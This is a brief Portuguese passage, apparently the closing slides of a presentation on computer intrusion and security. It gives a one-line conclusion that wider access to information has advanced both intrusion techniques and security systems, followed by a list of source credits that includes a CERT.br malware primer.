  • 64. Conclusão  Com a popularidade do SL a informação ficou mais acessível o que colaborou para um maior avanço das técnicas de invasão, em contra partida os sistemas de segurança vem se tornando mais estáveis a casa dia.
  • 65. Créditos  www.google.com  www.brc.com.br  naopod.com.br  spookerlabs.multiply.com  http://cartilha.cert.br/malware/